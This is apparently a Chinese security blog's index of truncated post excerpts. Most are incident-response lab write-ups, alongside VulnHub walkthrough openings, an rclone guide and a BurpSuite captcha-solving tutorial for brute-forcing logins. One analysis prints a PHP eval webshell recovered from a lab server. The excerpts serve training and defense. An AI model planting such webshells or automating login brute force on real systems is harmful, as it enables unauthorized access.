应急响应靶机训练 - Web3
应急响应靶机训练 - Web3小苕在省护值守中,在灵机一动情况下把设备停掉了,甲方问:为什么要停设备?小苕说:我第六感告诉我,这机器可能被黑了。请你找出以下内容作为通关条件: 攻击者的两个 IP 地址; 隐藏用户名称;hack6618$ 黑客遗留下的 3 个 flag; 本虚拟机的考点不在隐藏用户以及 IP 地址,相关账户密码:administrator/xj@123456 1 日志分析由于服务器之前关过,这里需要先启动 Web 服务,使用浏览器访问 Web 页面: 根据页面提示这是个 Z-Blog 建站,看页面正常,直接去看日志文件,使用 Notepad++ 打开(D:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1710201600): 根据日志内容发现,攻击者 192.168.75 在 2025.03.12 11:06:58 访问站点,之后访问了 /zb_system/login.php 页面。在网页中打开,发现是后台登录页面: 接着往下看,发现频繁出现 /zb_system/cmd.php?act=v...
Rclone 基础使用
Rclone 基础使用最近在家中部署了飞牛 NAS 来承载本地数据存储需求,之前还在云服务器上搭建了 Alist 用于统一管理各类网盘资源,后来又在 NAS 上加装了 Openlist 进一步拓展文件存储功能。百度发现 Rclone 这个工具不错,写一篇记录一下。 1 Rclone 介绍Rclone 诞生于 2014 年,是一款开源的跨平台云存储同步工具,支持超过 40 种云存储服务,包括我们熟知的阿里云 OSS、腾讯云 COS、百度网盘、Google Drive、OneDrive 等。其核心功能涵盖文件同步、复制、移动、删除、挂载云存储为本地磁盘等,同时支持数据加密传输与存储、断点续传、批量操作等高级特性。无论是个人用户进行数据备份,还是企业级的大规模数据迁移,Rclone 都能提供高效、稳定的解决方案。与图形化云盘客户端相比,Rclone 虽以命令行为主,但灵活性更高、资源占用更低,且支持脚本自动化操作,适配更多复杂使用场景。 官网地址:https://rclone.org/ 2 Windows 下的安装与配置Rclone 下载页面:https://rclone.org/d...
应急响应靶机训练 - Web2
应急响应靶机训练 - Web2小李在某单位驻场值守,深夜 12 点,甲方已经回家了,小李刚偷偷摸鱼后,发现安全设备有告警,于是立刻停掉了机器开始排查。这是他的服务器系统,请你找出以下内容,并作为通关条件: 攻击者的 IP 地址(两个); 攻击者的 Webshell 文件名; 攻击者的 Webshell 密码; 攻击者的伪 QQ 号; 攻击者的伪服务器 IP 地址; 攻击者的服务器端口; 攻击者的隐藏用户名; 攻击者是如何入侵的; 相关账户密码:administrator/Zgsf@qq.com 1 日志分析由于服务器之前关过,这里需要先启动 Web 服务,使用浏览器访问 Web 页面: 一眼 WordPress,看页面正常,直接去看日志文件,使用 Notepad++ 打开(C:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1709164800): 经查看 192.168.126.135 在 2024-02-29 12:35:10 访问了站点,在 2024-02-29 12:38:30 进行了目录扫描操作。 接着...
应急响应靶机训练 - Web1
应急响应靶机训练 - Web1小李在值守的过程中,发现有 CPU 占用飙升,出于胆子小,就立刻将服务器关机,并找来正在吃苕皮的 hxd 帮他分析,这是他的服务器系统,请你找出以下内容,并作为通关条件: 攻击者的 Shell 密码; 攻击者的 IP 地址; 攻击者的隐藏账户名称; 攻击者挖矿程序的矿池域名; 相关账户密码:administrator/Zgsf@admin.com 1 Flag-1由于服务器之前关过,这里需要先启动 Web 服务: 使用浏览器访问一下: 目前站点看不出入侵痕迹,根据要求可知,攻击者在站点下存在 WebShell。 打开 Web 根目录: 肉眼肯定看不出来,直接去看日志(C:\phpstudy_pro\Extensions\Apache2.4.39\logs),由于日志非常大,使用 Notepad++ 打开。经过查找发现在 2024-02-26 22:46:23 时出现了 shell.php 的访问记录: [!Warning] 这里正常说应该是看 Nginx 的,但实际是看 Apache 的。 拼接一下 shell.php 路径: 1C:...
第二章 日志分析 - redis 应急响应
第二章 日志分析 - redis 应急响应 靶机账号密码:root/xjredis 要求如下: 通过本地 PC SSH 到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交; 通过本地 PC SSH 到服务器并且分析黑客第一次上传的恶意文件,将黑客上传的恶意文件里面的 FLAG 提交; 通过本地 PC SSH 到服务器并且分析黑客反弹 shell 的 IP 为多少,将反弹 shell 的 IP 作为 FLAG 提交; 通过本地 PC SSH 到服务器并且溯源分析黑客的用户名,并且找到黑客使用的工具里的关键字符串 (flag {黑客的用户 - 关键字符串}),将用户名和关键字符串作为 FLAG 提交 通过本地 PC SSH 到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交; 1 Flag-1根据题意可知,靶机使用的服务是 Redis。 使用 SSH 连接到靶机: 查看服务器日志: 查看 Redis 日志: 接下往下分析日志内容,可以发现 192.168.100.13 一直尝试访问 MASTER: 之后攻击...
第一章 应急响应 - Linux 入侵排查
第一章 应急响应 - Linux 入侵排查 靶机账号密码:root/linuxruqin 要求如下: Web 目录存在木马,请找到木马的密码提交; 服务器疑似存在不死马,请找到不死马的密码提交; 不死马是通过哪个文件生成的,请提交文件名; 黑客留下了木马文件,请找出黑客的服务器 ip 提交; 黑客留下了木马文件,请找出黑客服务器开启的监听端口提交。 1 Flag-1 [!Warning]由于靶机按时扣费,所以一进去先把文件 dump 下来。 打包命令如下: 12tar zcvf html.tar.gz /var/www/html/*tar zcvf log.tar.gz /var/log/* 打包完成后,解压结果如下: 由于需要查找 WebShell,这里使用 D 盾扫一扫: 发现了两个可疑文件,依次查看其内容(1.tar 是网站源码,不用管): 12345678910111213141516171819202122232425# 1.php<?php eval($_POST[1]);?># index.php<?phpinclude('confi...
第一章 应急响应 - Webshell 查杀
第一章 应急响应 - Webshell 查杀 靶机账号密码:root/xjwebshell 要求如下: 黑客 WebShell 里面的 flag;(flag {xxxxx-xxxx-xxxx-xxxx-xxxx}) 黑客使用的什么工具的 Shell;(github 地址的 md5,flag {md5}) 黑客隐藏 Shell 的完整路径的 md5;(flag {md5}) 黑客免杀马完整路径的 md5;(flag {md5}) 1 Flag-1 [!Warning]由于靶机按时扣费,所以一进去先把文件 dump 下来。 打包命令如下: 1tar zcvf html.tar.gz /var/www/html/* 打包完成后,解压结果如下: 由于需要查找 WebShell,这里使用 D 盾扫一扫: 发现了四个可疑文件,依次查看其内容: 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364...
BurpSuite 验证码识别
BurpSuite 验证码识别上课用上课用。 本篇文章参考自: https://www.52pojie.cn/thread-1944555-1-1.html https://github.com/f0ng/captcha-killer-modified 1 前期准备适用情形:该篇文章只针对于在爆破口令是,每一次都会刷新的验证码,需要 BurpSuite 自动识别并传入请求中。 测试环境: Kali Linux 2024.2 Burp Suite Professional v2023.12.1(往期文章有) captcha-killer-modified captcha-killer-modified-0.24.6.zip captcha-killer-modified-0.24.6-jdk14.jar 2 工具安装2.1 安装插件首先将 captcha-killer-modified-0.24.6.zip 和 captcha-killer-modified-0.24.6-jdk14.jar 传入 Kali 中: 在 BurpSuite 上安装 captcha-kil...
DC-6
DC-6 写写打靶记录。 靶机地址:https://www.vulnhub.com/entry/dc-6,315/ 1 信息收集 首先查看 Kali IP 地址: 1234567891011121314root at kali in ~/DC6 $ ip --color address1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever2: eth0: <BROADCAST,MULTIC...
DC-5
DC-5 写写打靶记录。 靶机地址:https://www.vulnhub.com/entry/dc-5,314/ 1 信息收集 首先查看 Kali IP 地址: 1234567891011121314root at kali in ~/DC5 $ ip --color address1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever2: eth0: <BROADCAST,MULTIC...
